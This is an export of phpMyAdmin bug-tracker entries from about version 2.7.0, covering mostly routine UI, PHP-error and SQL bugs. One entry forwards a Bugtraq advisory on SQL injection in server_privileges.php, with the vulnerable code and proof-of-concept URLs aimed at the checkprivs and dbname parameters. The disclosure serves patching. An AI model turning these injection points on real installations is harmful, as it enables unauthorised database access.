index.php uses different values for the id and name values in the framesets lt;frame frameborder= 0 id= leftFrame src= left.php name= nav1133898805 gt; lt;frame frameborder= 0 id= rightFrame src= main.php name= phpmain1133898805 gt; HTML Tidy gives a very good explanation for the problem, so I ll just quote NAME and ID are the old and the new name for the same attribute.
If both are defined, they should be equal.
Use id new) or name old) ?
The id attribute shares the same name space as the name attribute when used for anchor names.
The id attribute can act as more than just an anchor name e.g., style sheet selector, processing identifier, etc.).
Some older user agents don t support anchors created with the id attribute.
The name attribute allows richer anchor names with entities).
Solution Remove one of the both attribute or make the 2 values of ID and NAME equal Sample Define the name=id or just id.
BAD lt;a name= abcdef id= ghijklm gt; GOOD lt;a name= abcdef id= abcdefgh gt; GOOD lt;a id= abcdefgh gt; References W3C Anchor and ID http www.w3.org TR html4 struct links.html anchors with id W3C ID definition http www.w3.org TR html4 struct global.html adef id Original URL https sourceforge.net p phpmyadmin bugs 1897 https sourceforge.net p phpmyadmin bugs 1897 Original author cyberdog3k Found in version Latest Git","bug"
"24444","8265","auto increment update does not work.
If you try to change the auto increment index or reset the value in the operations page, it does not work anymore, it did two versions ago... now you have to use the alter in the SQL window to do the same thing you use to be able to do with change value and GO button.
I sometimes need to change the index several times a day because of deleted records in my profiles accounts and the introduced bug is very annoying.
I use to be able to go the the operations page, change the value in the auto increment window, hit GO and it changed, NOW, I get an sql message the change was successful and an ALTER statement but the value remains unchanged.
Here is a copy of the alter statement, if I run this in an sql window the value does get changed, btw.
ALTER TABLE `Profiles` PACK KEYS =1 CHECKSUM =0 DELAY KEY WRITE =0 AUTO INCREMENT =95 Original URL https sourceforge.net p phpmyadmin bugs 1907 https sourceforge.net p phpmyadmin bugs 1907 Original author bluescorpion Found in version 2.7.0 pl1","bug"
"24444","8266","ForceSSL setting is ForceSLL in config.default.ph.
Hi, In the config.default.php file from phpMyAdmin 2.7.0 pl1.zip, the following line is present cfg[ ForceSLL ] = FALSE; whether to force using https If I am correct, this line should read cfg[ ForceSSL ] = FALSE; whether to force using https Hope this helps!
Original URL https sourceforge.net p phpmyadmin bugs 1898 https sourceforge.net p phpmyadmin bugs 1898 Original author minkus Found in version 2.7.0 pl1","bug"
"24444","8267","Wrong page after insert.
If I insert to newly created table, I m switched back to database structure.
Way to reproduce 1\.
Create table either manually, entering SQL or by copying existing), you are automatically switched to newly created table.
2\.
Open insert page, enter some data and submit.
3\.
Now you lost table context and SQL is displayed in database context.
Original URL https sourceforge.net p phpmyadmin bugs 1900 https sourceforge.net p phpmyadmin bugs 1900 Original author nijel Found in version Latest Git","bug"
"24444","8268","open table in new window.
Sometimes, after I run a SQL, when I click on a table listed in the left frame, it open in onother window, like target=blank Original URL https sourceforge.net p phpmyadmin bugs 1912 https sourceforge.net p phpmyadmin bugs 1912 Original author shangel Found in version 2.7.0 pl1","bug"
"24444","8269","CREATE TABLE doesn t reload left frame.
Entering CREATE TABLE query does not reload left frame.
Original URL https sourceforge.net p phpmyadmin bugs 1901 https sourceforge.net p phpmyadmin bugs 1901 Original author nijel Found in version Latest Git","bug"
"24444","8270","cant create new table no privs).
I just upgraded from the last available 2.6.x release to 2.7.0 pl1 and, when i select my database, it says i dont have any privileges to create new tables.
Iam assuming my mysql php configuration is OK because the old release i was using wasnt returning this error.
Is this a known issue?
Am i doing anything wrong?
I used the configuration for my old myadmin release and then tried with a new one from scratch.
Thanks in advance, Luxc3xads Miguel Silva Original URL https sourceforge.net p phpmyadmin bugs 1902 https sourceforge.net p phpmyadmin bugs 1902 Original author lmfsilva Found in version 2.7.0 pl1","bug"
"24444","8271","server privileges.php SQL Injection Vulnerabilities.
Not sure if you have seen this yet just passing it along From Alice Bryson lt;abryson bytefocus.com gt; Date December 16, 2005 8 39 36 PM EST CA) To lt;bugtraq securityfocus.com gt; Subject phpMyAdmin server privileges.php SQL Injection Vulnerabilities.
phpMyAdmin server privileges.php SQL Injection Vulnerabilities.
I.
BACKGROUND phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the Web.
II.
DESCRIPTION phpMyAdmin server privileges.php is prone to SQL Injection vulnerability.
A remote attacker may execute arbitrary SQL command by sending specially crafted URI to server privileges.php db name or checkprivs parameter.
III.
PUBLISH DATE 2005 12 7 IV.
AUTHOR lwang lwang.org V. AFFECTED SOFTWARE phpMyAdmin 2.7.0 is confirmed to affected.
Older versions may also be affected.
The following vendors distribute vulnerable phpMyAdmin package The FreeBSD Project Gentoo Foundation Novell, Inc. SuSE) The Debian Project SuSE) VI.
ANALYSIS in server privileges.php line 27 if isset dbname ) ) \{ if preg match \\\\ ?
| ) i , dbname ) ) \{ if preg match ?
lt;!\\\\) ?
| ) i , dbname ) ) \{ dbname is wildcard = true; \} else \{ dbname is wildcard = false; \} \} parameter dbname is not validate properly.
line 1197 if isset viewing mode) viewing mode == db ) \{ db = checkprivs; url query .= amp;amp;goto=db operations.php ; Gets the database structure sub part = structure ; require .
db details db info.php ); echo \n ; \} else \{ require .
server links.inc.php ); \} line 1241 if empty adduser ) empty checkprivs ) ) \{ parameter checkprivs not validate properly.
VII.
Proof of Concept http victim phpmyadmin server privileges.php?server=1 checkprivs= http victim phpmyadmin server privileges.php?server=1 hostname= username=1 dbname=1 tablename=1 VIII.
SOLUTION I have not contact the vendor, and no aware of any security patch till now.
IX.
REFERENCE http www.phpmyadmin.net Original URL https sourceforge.net p phpmyadmin bugs 1918 https sourceforge.net p phpmyadmin bugs 1918 Original author cyberscribe Found in version 2.7.0","bug"
"24444","8272","Can not select insert as new row.
In firefox 1.5 it is not possible to select insert as new row in selectbox while editing row.
It works fine in epiphany based on older gecko.
On first look I don t see anything obviously wrong there.
Original URL https sourceforge.net p phpmyadmin bugs 1903 https sourceforge.net p phpmyadmin bugs 1903 Original author nijel Found in version Latest Git","bug"
"24444","8273","Does not find newly created config.
When session was created when no config file existed and it was later added, phpMyAdmin still refuses to work.
Original URL https sourceforge.net p phpmyadmin bugs 1904 https sourceforge.net p phpmyadmin bugs 1904 Original author nijel Found in version Latest Git","bug"
"24444","8274","too many errors.
Notice Array to string conversion in C \Program Files\Apache Group\Apache2 \htdocs\phpMyAdmin\libraries\grab globals.lib.php on line 195 Warning Cannot modify header information headers already sent by output started at C \Program Files\Apache Group\Apache2 \htdocs\phpMyAdmin\libraries\grab globals.lib.php 195) in C \Program Files\Apache Group\Apache2 \htdocs\phpMyAdmin\libraries\common.lib.php on line 2429 Warning Cannot modify header information headers already sent by output started at C \Program Files\Apache Group\Apache2 \htdocs\phpMyAdmin\libraries\grab globals.lib.php 195) in C \Program Files\Apache Group\Apache2 \htdocs\phpMyAdmin\libraries\header http.inc.php on line 13 Warning Cannot modify header information headers already sent by output started at C \Program Files\Apache Group\Apache2 \htdocs\phpMyAdmin\libraries\grab globals.lib.php 195) in C \Program Files\Apache Group\Apache2 \htdocs\phpMyAdmin\libraries\header http.inc.php on line 14 Warning Cannot modify header information headers already sent by output started at C \Program Files\Apache Group\Apache2 \htdocs\phpMyAdmin\libraries\grab globals.lib.php 195) in C \Program Files\Apache Group\Apache2 \htdocs\phpMyAdmin\libraries\header http.inc.php on line 15 Warning Cannot modify header information headers already sent by output started at C \Program Files\Apache Group\Apache2 \htdocs\phpMyAdmin\libraries\grab globals.lib.php 195) in C \Program Files\Apache Group\Apache2 \htdocs\phpMyAdmin\libraries\header http.inc.php on line 16 Warning Cannot modify header information headers already sent by output started at C \Program Files\Apache Group\Apache2 \htdocs\phpMyAdmin\libraries\grab globals.lib.php 195) in C \Program Files\Apache Group\Apache2 \htdocs\phpMyAdmin\libraries\header http.inc.php on line 19 Server localhost Original URL https sourceforge.net p phpmyadmin bugs 1905 https sourceforge.net p phpmyadmin bugs 1905 Original author keichee Found in version Latest Git snapshot","bug"
"24444","8275","Tons of errors with E STRICT.
We should check everything for running with E STRICT enabled.
To reproduce set in your php.ini error reporting = E ALL | E STRICT Most of those come from new classes Strict Standards var Deprecated.
Please use the public private protected modifiers in phpMyAdmin libraries Theme.class.php on line 29 Strict Standards var Deprecated.
Please use the public private protected modifiers in phpMyAdmin libraries Theme.class.php on line 34 Strict Standards var Deprecated.
Please use the public private protected modifiers in phpMyAdmin libraries Theme.class.php on line 39 Strict Standards var Deprecated.
Please use the public private protected modifiers in phpMyAdmin libraries Theme Manager.class.php on line 12 Strict Standards var Deprecated.
Please use the public private protected modifiers in phpMyAdmin libraries Theme Manager.class.php on line 17 Strict Standards var Deprecated.
Please use the public private protected modifiers in phpMyAdmin libraries Theme Manager.class.php on line 22 Strict Standards var Deprecated.
Please use the public private protected modifiers in phpMyAdmin libraries Theme Manager.class.php on line 27 Strict Standards var Deprecated.
Please use the public private protected modifiers in phpMyAdmin libraries Theme Manager.class.php on line 32 Strict Standards var Deprecated.
Please use the public private protected modifiers in phpMyAdmin libraries Theme Manager.class.php on line 37 Strict Standards Redefining already defined constructor for class PMA Theme Manager in phpMyAdmin libraries Theme Manager.class.php on line 138 Strict Standards var Deprecated.
Please use the public private protected modifiers in phpMyAdmin libraries Config.class.php on line 10 Strict Standards var Deprecated.
Please use the public private protected modifiers in phpMyAdmin libraries Config.class.php on line 15 Strict Standards var Deprecated.
Please use the public private protected modifiers in phpMyAdmin libraries Config.class.php on line 20 Strict Standards var Deprecated.
Please use the public private protected modifiers in phpMyAdmin libraries Config.class.php on line 25 Strict Standards var Deprecated.
Please use the public private protected modifiers in phpMyAdmin libraries Config.class.php on line 30 Strict Standards var Deprecated.
Please use the public private protected modifiers in phpMyAdmin libraries Config.class.php on line 35 Strict Standards var Deprecated.
Please use the public private protected modifiers in phpMyAdmin libraries Config.class.php on line 40 Strict Standards var Deprecated.
Please use the public private protected modifiers in phpMyAdmin libraries Config.class.php on line 45 Strict Standards var Deprecated.
Please use the public private protected modifiers in phpMyAdmin libraries Config.class.php on line 52 Strict Standards Redefining already defined constructor for class PMA Config in phpMyAdmin libraries Config.class.php on line 439 Strict Standards Non static method PMA Config getCookiePath ) should not be called statically in phpMyAdmin libraries session.inc.php on line 39 Strict Standards Non static method PMA Config isHttps ) should not be called statically in phpMyAdmin libraries session.inc.php on line 40 Original URL https sourceforge.net p phpmyadmin bugs 1906 https sourceforge.net p phpmyadmin bugs 1906 Original author nijel Found in version Latest Git","bug"
"24444","8276","aplewebkit spelt wrongly in onKeyDownArrowsHandler.
if navigator.userAgent.toLowerCase ).indexOf aplewebkit ) != 1) aplewebkit spelt wrongly in onKeyDownArrowsHandler should be applewebkit?
Original URL https sourceforge.net p phpmyadmin bugs 1908 https sourceforge.net p phpmyadmin bugs 1908 Original author wanderingzombie Found in version 2.7.0","bug"
"24444","8277","Call to undefined function PMA DBI try query ).
Fatal error Call to undefined function PMA DBI try query ) in F \Program Files\Apache Group\Apache2\htdocs\SQL2\libraries\check user privileges.lib.php on line 16 To get this I was adding a unique index on InnoDB table which had dublicate entries, I got an error with browse button, clicked on it and was presented with two resuls that were dublicate of each other and preventing UNIQUE index to be added.
When I clicked on [delete] icon next to one of them and agreed with promt dialog this php error was shown.
Original URL https sourceforge.net p phpmyadmin bugs 1909 https sourceforge.net p phpmyadmin bugs 1909 Original author mdonatas Found in version 2.7.0","bug"
"24444","8278","CSS does not load with SSL MSIE use.
I want to provide phpMyAdmin thru https connection.
When I log sucessfull in, there are probably no CSS files loaded while using MSIE to browse.
When I use FireFox on Windows, it seems to be fine.
All permitions are set temporary to 777, so there cannot be a problem.
Only with SSL and only with MSIE friend tell me the same problem on FF on Linux).
It is some bug or how should I continue?
Thx.
Original URL https sourceforge.net p phpmyadmin bugs 1910 https sourceforge.net p phpmyadmin bugs 1910 Original author nettos","bug"
"24444","8279","Cannot set up SSL version of phpMyAdmin.
I cannot se up SSL version of phpMyAdmin.
If i set to variable cfg[ PmaAbsoluteUri ] absolute https adress or i leave it blank to autodetection, i both cases behavior of phpMyAdmin looks crazy.
I looks like no CSS is loaded, or any other CSS fiel is loaded, i cannot change other css template style and so on.
When I set up classic http adres, it goes well.
If I try to provide any other application on the same SSL server, it goes well to.
It look like same bug od phpMyAdmin.
Original URL https sourceforge.net p phpmyadmin bugs 1911 https sourceforge.net p phpmyadmin bugs 1911 Original author nettos","bug"
"24444","8280","innoDB constraints applied too early when copying.
When copying a database wich has innoBD tables with constraints, PHPmyAdmin tries to apply the constraints on each table right after copying it.
This leads to errors.
The constraints should be applied after the complete database has been copied.
Original URL https sourceforge.net p phpmyadmin bugs 1924 https sourceforge.net p phpmyadmin bugs 1924 Original author gerbald Found in version 2.6.2","bug"
"24444","8281","Cannot pass true by reference to PMA setCookie.
Trying to copy a database I recieved the following error Fatal error Cannot pass parameter 2 by reference in var www pma dev phpMyAdmin db operations.php on line 111 The database is copied correctly, I m just not changed to it.
The problem occurs when one has selected Switch to copied database as an option.
It seems to be caused in db operations.php by the line PMA setCookie pma switch to new , true ); where, in common.lib.php it s defined as function PMA setCookie cookie, value, default = null).
PHP doesn t like when you pass true by reference.
The solution seems to be simple; change the second parameter to not be passed by value, although I ve no idea whether this will break other code.
I ve attached a .diff, but assuming that is the correct fix it will take you as long to download and merge my fix as it would take to do your own, so maybe it s pointless.
Original URL https sourceforge.net p phpmyadmin bugs 1925 https sourceforge.net p phpmyadmin bugs 1925 Original author ibennetch Found in version Latest Git","bug"
"24444","8282","server databases.php can t drop tables.
From the main page click Databases this loads server databases.php.
Try to drop a database.
The page just reloads.
Somehow the drop image is doing something, just not the right thing.
This used to be a form submit button; I m not really sure what s happening now...my JavaScript is pretty weak.
Thanks!
Original URL https sourceforge.net p phpmyadmin bugs 1926 https sourceforge.net p phpmyadmin bugs 1926 Original author ibennetch Found in version Latest Git","bug"
"24444","8283","can t edit fields in some race conditions.
With an empty or not) database with a particular table and some data in it, when clicking on the edit field icon the pen) while displaying the table data, I get the error Fatal error Call to undefined function pma generate common url ) in ...) MySQLAdmin libraries header meta style.inc.php on line 44 I get this with mysql 4.1.x and 5.x, debian woody AND sarge, apache 1.3.34, php 4.3.10 and php 4.4.1.
Here attached the data needed to reproduce.
Original URL https sourceforge.net p phpmyadmin bugs 1913 https sourceforge.net p phpmyadmin bugs 1913 Original author herel Found in version 2.7.0 pl1","bug"
"24444","8284","Cannot edit a table having 40 columns.
if i try to edit a table that i have that has 40 columns i get the below message.
edit of smaller talbes work fine.
Error message lt;link rel= stylesheet type= text css href= .
css phpmyadmin.css.php?
Fatal error Call to undefined function PMA generate common url ) in c \program files\apache group\Apache\htdocs\phpmyadmin\libraries\header meta st yle.inc.php on line 40 Original URL https sourceforge.net p phpmyadmin bugs 1914 https sourceforge.net p phpmyadmin bugs 1914 Original author ocsurf Found in version 2.7.0 rc1","bug"
"24444","8285","Call undefined pma generate common url ).
I executed a sql query to check some consistency of my database SELECT events.
FROM `events` , kalender structure WHERE events.Structure ID = kalender structure.Structure ID AND events.SSID != kalender structure.kalender id ORDER BY `SSID` ASC LIMIT 0 , 30 I get the following errors with phpMyAdmin 2.7.0 pl1 and MySQL 4.0.18 When I try to edit a result record Fatal error Call to undefined function pma generate common url ) in srv www htdocs community.scoutnet.de public html ssl kalender phpmyadmin libraries header meta style.inc.php on line 44 When I try to delete one Fatal error Call to undefined function pma dbi try query ) in srv www htdocs community.scoutnet.de public html ssl kalender phpmyadmin libraries check user privileges.lib.php on line 16 Thx for your work on phpmyadmin!!!
debug backtrace ) before the error lines Array [0] = gt; Array [file] = gt; lt;deleted for privacy gt; phpmyadmin header.inc.php [line] = gt; 26 [function] = gt; require once ) [1] = gt; Array [file] = gt; lt;deleted for privacy gt; phpmyadmin tbl change.php [line] = gt; 11 [args] = gt; Array [0] = gt; lt;deleted for privacy gt; phpmyadmin header.inc.php ) [function] = gt; require once ) [2] = gt; Array [file] = gt; lt;deleted for privacy gt; phpmyadmin libraries grab globals.lib.php [line] = gt; 169 [args] = gt; Array [0] = gt; lt;deleted for privacy gt; phpmyadmin tbl change.php ) [function] = gt; require ) [3] = gt; Array [file] = gt; lt;deleted for privacy gt; phpmyadmin libraries common.lib.php [line] = gt; 51 [args] = gt; Array [0] = gt; lt;deleted for privacy gt; phpmyadmin libraries grab globals.lib.php ) [function] = gt; require once ) [4] = gt; Array [file] = gt; lt;deleted for privacy gt; phpmyadmin tbl row action.php [line] = gt; 4 [args] = gt; Array [0] = gt; lt;deleted for privacy gt; phpmyadmin libraries common.lib.php ) [function] = gt; require once ) ) Array [0] = gt; Array [file] = gt; lt;deleted for privacy gt; phpmyadmin libraries check user privileges.lib.php [line] = gt; 30 [function] = gt; pma issuperuser [args] = gt; Array ) ) [1] = gt; Array [file] = gt; lt;deleted for privacy gt; phpmyadmin sql.php [line] = gt; 10 [args] = gt; Array [0] = gt; lt;deleted for privacy gt; phpmyadmin libraries check user privileges.lib.php ) [function] = gt; require once ) [2] = gt; Array [file] = gt; lt;deleted for privacy gt; phpmyadmin libraries grab globals.lib.php [line] = gt; 169 [args] = gt; Array [0] = gt; lt;deleted for privacy gt; phpmyadmin sql.php ) [function] = gt; require ) [3] = gt; Array [file] = gt; lt;deleted for privacy gt; phpmyadmin libraries common.lib.php [line] = gt; 51 [args] = gt; Array [0] = gt; lt;deleted for privacy gt; phpmyadmin libraries grab globals.lib.php ) [function] = gt; require once ) [4] = gt; Array [file] = gt; lt;deleted for privacy gt; phpmyadmin tbl row action.php [line] = gt; 4 [args] = gt; Array [0] = gt; lt;deleted for privacy gt; phpmyadmin libraries common.lib.php ) [function] = gt; require once ) ) Original URL https sourceforge.net p phpmyadmin bugs 1928 https sourceforge.net p phpmyadmin bugs 1928 Original author jcv2140 Found in version 2.7.0 pl1","bug"
"24444","8286","No left update after selecting second database FF1.5).
Reproduce steps 1 Select db in dropdown list in left frame gt;tables are properly loaded in left frame) 2 select other db in dropdown list in left frame gt;left frame doesn t update, javascript error was generated Dutch Fout uncaught exception Geen toestemming om eigenschap Window.openDb te lezen) English error uncaugth exception no permission to read property Window.openDb) System information Mozilla 5.0 Windows; U; Windows NT 5.1; nl; rv 1.8) Gecko 20051111 Firefox 1.5 Original URL https sourceforge.net p phpmyadmin bugs 1915 https sourceforge.net p phpmyadmin bugs 1915 Original author mroeling Found in version 2.7.0 pl1","bug"
"24444","8287","no update of left bar on db select.
When choosing a DB from the left dropdown menu the sidebar is not updated and the following error is shown in the firefox javascript menu Error window.parent.openDb is not a function Source File http 192.168.2.169 phpmyadmin left.php?lang=en utf 8 Line 1 Original URL https sourceforge.net p phpmyadmin bugs 1916 https sourceforge.net p phpmyadmin bugs 1916 Original author the man stephen Found in version Latest Git","bug"
"24444","8288","CSS error with MainPageIconic=FALSE.
Set cfg[ MainPageIconic ] = FALSE Error The menutexts on the leftside navigation have borders around them.
This was not the case up to before 2.7.x and seems to be related to changes in the CSS.
Original URL https sourceforge.net p phpmyadmin bugs 1917 https sourceforge.net p phpmyadmin bugs 1917 Original author neufeind Found in version Latest Git","bug"
"24444","8289","headers already sent on bookmarked query.
We have a bookmarked query that loads all the data from a table that s joined to another table so we can see which of this data has been active in the last year).
Everything goes along swimmingly but when we try to edit a row php falls apart.
I haven t tried deleting data because this is a sensitive db but I will try if people think it will help.
I ve hunted around for this problam on the forums, the bugtracker, and on google but to no avail.
I haven t really tried debugging the code since I m assuming you have a lot of tools that I don t have.
I m willing to download the cvs copy if you think it will help.
Currently running pma 2.7.0pl1 php 4.3.9 w Zend 1.3.0 mysql 4.12 rhel 4 I think, maybe 3.
I don t know how to check) Original URL https sourceforge.net p phpmyadmin bugs 1919 https sourceforge.net p phpmyadmin bugs 1919 Original author vosechu Found in version 2.7.0 pl1","bug"
"24444","8290","cannot un null a value.
Table structure CREATE TABLE `test` `string` varchar 255) default NULL ) TYPE=MyISAM; INSERT INTO `test` VALUES NULL); Now I click View, Edit the value) and uncheck the NULL option.
The value should be changed to , but phpMyAdmin responses with No change and does not change the value!
Original URL https sourceforge.net p phpmyadmin bugs 1920 https sourceforge.net p phpmyadmin bugs 1920 Original author nixniemand Found in version 2.6.4 pl3","bug"
"24444","8291","no defaults for text and longtext fields export structure.
I m using WinXP, PHP 5.1.1, MySQL 4.1.13 and 5.0.16 PHPMyAdmin is used to export the table structures for the Moodle project.
When I upgraded to MySQL 5 by default it installed in STRICT ALL TABLES mode which requires that all fields be specified for an INSERT if there is not a default value.
As a result, I noticed that PHPMyAdmin does not provide DEFAULT or DEFAULT NULL when it exports the table structure for fields of text or longtext.
I m not sure if this is a bug or by design.
If it is by design, I would like to see an option that would allow for a STRICT EXPORT which would include setting default values when there is none for text and longtext fields.
As an example, note below how there is no default value for the description field.
Would a default NULL or default be appropriate?
Your thoughts on this would be appreciated.
Peace Anthony phpMyAdmin SQL Dump version 2.7.0 pl1 Table structure for table `mdl course categories` CREATE TABLE `mdl course categories` `id` int 10) unsigned NOT NULL auto increment, `name` varchar 255) NOT NULL default , `description` text NOT NULL, `parent` int 10) unsigned NOT NULL default 0 , `sortorder` int 10) unsigned NOT NULL default 0 , `coursecount` int 10) unsigned NOT NULL default 0 , `visible` tinyint 1) NOT NULL default 1 , `timemodified` int 10) unsigned NOT NULL default 0 , `depth` int 10) unsigned NOT NULL default 0 , `path` varchar 255) NOT NULL default , PRIMARY KEY `id`), UNIQUE KEY `id` `id`) ) ENGINE=MyISAM DEFAULT CHARSET=latin1 COMMENT= Course categories AUTO INCREMENT=2 ; Original URL https sourceforge.net p phpmyadmin bugs 1921 https sourceforge.net p phpmyadmin bugs 1921 Original author arborrow Found in version 2.7.0 pl1","bug"
"24444","8292","Wrong code sent to change general auto increment value.
Hello!
First, I appreciate all the work you do on PMA.
Though, I do face some difficulty when trying to edit the global auto increment value Operations tab gt; Table options).
When inserting a value into the input box and press OK, the old value is still sent in the SQL query to the database.
A previous verion think it was 2.6.2) performed the chance as expected.
My 2.6.4 pl4 don t. Thank you for you time.
Per Eriksson PHP and MySQL programmer student per at katrineholm dot org Original URL https sourceforge.net p phpmyadmin bugs 1922 https sourceforge.net p phpmyadmin bugs 1922 Original author erinet Found in version 2.6.4 pl4","bug"
"24444","8293","table creation on special databases.
looks like bug 1376314) whith mysql 4.0.x PMA MYSQL INT VERSION lt; 40102), when database is checked to see if user is allowed to create table in it, database name isn t escaped.
So, when database name has special chars in it, it won t let the user create tables in it.
Here attached the patch to fix this.
it only consists in adding quoting marks in one query.
maybe there are other places in the code where it should be done.
Original URL https sourceforge.net p phpmyadmin bugs 1923 https sourceforge.net p phpmyadmin bugs 1923 Original author herel Found in version 2.7.0 pl1","bug"
"24444","8294","deleting a row in a non pk ed table.
CREATE TABLE `faq` `faq id` int 16) NOT NULL auto increment, `faq name` varchar 255) NOT NULL default , `faq text` text NOT NULL, KEY `faq id`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; INSERT INTO `faq` `faq id`, `faq name`, `faq text`) VALUES 1, How do I receive my Free Shipping?
, 1.
Place your products in your Academic Superstore shopping cart.\r\n2.
Select UPS ground shipping Allow 3 5 working days for delivery).\r\n3.
Proceed to Checkout Your shipping will be free!\r\n\r\nRestrictions and Additional Information\r\n\r\n Free UPS Ground shipping applies to U.S. delivery addresses in the 48\r\ncontinental states only.
It excludes Alaska and Hawaii.\r\n Customers including those in Alaska and Hawaii) may optionally choose a\r\n2nd Day Air option and have the cost of the UPS ground shipping automatically\r\nsubtracted from their 2nd Day Air price.\r\n Free shipping may not be used in conjunction with any other promotion.\r\n As always, proof of Academic Eligibility is required.\r\n Returned product requires reimbursement of original shipping cost.\r\n Academic Superstore reserves the right to change or discontinue this offer at any time.
); Try to click the X to delete the row Fatal error Call to undefined function pma dbi try query ) in var www html phpMyAdmin 2.7.0 pl1 libraries check user privileges.lib.php on line 16 When I drop the key and make it a PK, then the delete succeeds ok.
The other developer obviously miskeyed the table but still a fatal error out of phpmyadmin is no good.
Original URL https sourceforge.net p phpmyadmin bugs 1927 https sourceforge.net p phpmyadmin bugs 1927 Original author quelrod Found in version 2.7.0 pl1","bug"
"24444","8295","Print view show all columns as Null Yes.
Whne I use function PrintView for any table all of column are show with Null as Yes.
I have MySQL 5.0.15.
Original URL https sourceforge.net p phpmyadmin bugs 1929 https sourceforge.net p phpmyadmin bugs 1929 Original author tprochazka Found in version 2.7.0 pl1","bug"
"24444","8296","Unclosed code tag in Documentation.html.
In the section for cfg[IconvExtraParams] there s an unclosed well, the close tag lacks a ) code tag.
Patch attached.
Original URL https sourceforge.net p phpmyadmin bugs 1930 https sourceforge.net p phpmyadmin bugs 1930 Original author ibennetch Found in version Latest Git","bug"
"24444","8297","Safari s Rendering of Create Table Fieldset.
In phpMyAdmin 2.7.0 pl1, there s a problem with the way Safari renders the lt;fieldset gt; for the Create new table on database X area.
The fields appear outside the lt;fieldset gt;.
However, this only happens here; the rest of the lt;fieldset gt;s throughout the entire application work properly.
I m not sure what s causing this, but it s kind of ugly to look at; it does function properly, though.
Original URL https sourceforge.net p phpmyadmin bugs 1931 https sourceforge.net p phpmyadmin bugs 1931 Original author theonlydaemon Found in version 2.7.0 pl1","bug"
"24444","8298","CSV Import Error.
MySQL gives following error message Invalid parameter for CSV import Lines terminated by when field Lines terminated by in tab Import set to auto .
There is bug in file libraries\import\csv.php line 48) where you check strlen csv new line) .
It can be more then one character ) if strlen csv terminated) != 1) \{ message = sprintf strInvalidCSVParameter, strFieldsTerminatedBy); show error header = TRUE; error = TRUE; \} elseif strlen csv enclosed) != 1) \{ message = sprintf strInvalidCSVParameter, strFieldsEnclosedBy); show error header = TRUE; error = TRUE; \} elseif strlen csv escaped) != 1) \{ message = sprintf strInvalidCSVParameter, strFieldsEscapedBy); show error header = TRUE; error = TRUE; \} elseif strlen csv new line) != 1) \{ message = sprintf strInvalidCSVParameter, strLinesTerminatedBy); show error header = TRUE; error = TRUE; \} Thanks, good luck and Happy New Year, guys!
Original URL https sourceforge.net p phpmyadmin bugs 1932 https sourceforge.net p phpmyadmin bugs 1932 Original author papa karlos Found in version 2.7.0 pl1","bug"
"24444","8299","Drop User Problems under MySQL 4.1.x.
Hi phpMyAdmin team!
In the latest version of phpMyAdmin 2.7.0 pl1) there are two problems when removing users using MySQL 4.1.14) 1) To properly use DROP USER, you need to REVOKE the user s privileges first.
http dev.mysql.com doc refman 4.1 en drop user.html) 2) By default, MySQL has an entry in the user table with no username set that cannot be deleted using DROP USER. )
In my unified diff that is attached I simply added a REVOKE command before the DROP USER command.
I debated with myself whether or not to include a GRANT OPTION to the revoke statement i.e.
REVOKE ALL PRIVILEGES, GRANT OPTION...), but decided not to go with it because I do not fully understand the side effects if any) this could have.
The second thing I did was define an IF statement that checks to see if this user is empty.
If it is, it will revert to the old pre 40101) way of DELETE ing the user from the database.
A third change was made to ensure that the DELETE commands weren t run a second time if the mode != 2.
I love phpMyAdmin, as I use it both personally and professionally.
I love how far this product has come over the years, and only wish to help make this product even better than it already is.
This is my first serious patch, so I apologize if it is not correcly done.
I did grab the latest at the time of this writing) copy of the CVS, and used the diff u command to generate the diff file.
I also have successfully tested all three modes for deleting users with success.
Thank you all again for phpMyAdmin!
Keep up the great work.
Ken Original URL https sourceforge.net p phpmyadmin bugs 1933 https sourceforge.net p phpmyadmin bugs 1933 Original author eclipsboi","bug"
"24444","8300","mysqli.dbi.lib.php and zend.ze1 compatibility... Hi If zend.ze1 compatibility mode is enabled and you are using the mysqli extension you get an error Fatal error Trying to clone an uncloneable object of class mysqli in libraries dbi mysqli.dbi.lib.php on line 53 I think PHPMyAdmin should disable that option at runtime.
patch put ini set zend.ze1 compatibility mode ,false); and the beggining of libraries dbi mysqli.dbi.lib.php Original URL https sourceforge.net p phpmyadmin bugs 1934 https sourceforge.net p phpmyadmin bugs 1934 Original author judas iscariote Found in version Latest Git","bug"
"24444","8301","undefined index tab count.
The following error appeared in the site menu pane below the dropdown box and before the table listing) Notice Undefined index tab count in var www phpMyAdmin 2.7.0 pl2 libraries common.lib.php on line 1706 PHP 5.1.1 Debian 3.1 I forgot what I did to get the error had to register first) but it looks like a simple PHP error to me, so reproduction steps aren t neccesary?
Original URL https sourceforge.net p phpmyadmin bugs 1935 https sourceforge.net p phpmyadmin bugs 1935 Original author dzakuha Found in version 2.7.0 pl2","bug"
"24444","8302","SQL executer tries to find keys from current table.
The SQL executer click on the sql tab) tries to find keys from current table.
This errors when there was no table selected when querying direct on a database) Reproduce select a database, click SQL tab and enter some query.
You will get a SQL error saying SQL query SHOW KEYS FROM isn t valid tablename missing) Original URL https sourceforge.net p phpmyadmin bugs 1936 https sourceforge.net p phpmyadmin bugs 1936 Original author spider 007 Found in version 2.7.0 pl2","bug"
"24444","8303","Export screen div alignment wrong in Safari.
PMA s Export screen looks awful in Safari, probably since PMA 2.7.0.
Whereas in 2.6.3 there was a left column and a right column, now the area that used to be the right column appears below and behind the left column.
See screenshot, made with Safari 2.0.2 416.13) and PMA 2.7.0 pl2.
Original URL https sourceforge.net p phpmyadmin bugs 1937 https sourceforge.net p phpmyadmin bugs 1937 Original author ryandesign Found in version 2.7.0 pl2","bug"
"24444","8304","Safari Bookmark query fieldset float problem.
The Bookmark this SQL query fieldset displays incorrectly in Safari 2.0.2. the fieldset does not surround its contents like it should.
It s a float problem.
The patch is attached.
See also bug 1389868 which was the same problem in the Create new table fieldset.
Original URL https sourceforge.net p phpmyadmin bugs 1938 https sourceforge.net p phpmyadmin bugs 1938 Original author ryandesign Found in version 2.7.0 pl2","bug"
"24444","8305","Show Processlist default vs full.
Hi, phpMyAdmin uses show processlist instead of show full processlist.
This causes queries to be truncated.
You should include full.
Original URL https sourceforge.net p phpmyadmin bugs 1939 https sourceforge.net p phpmyadmin bugs 1939 Original author olafvdspek","bug"
"24444","8306","Errors with PHP in strict Mode.
Strict Standards strftime ) [function.strftime] It is not safe to rely on the system s timezone settings.
Please use the date.timezone setting, the TZ environment variable or the date default timezone set ) function.
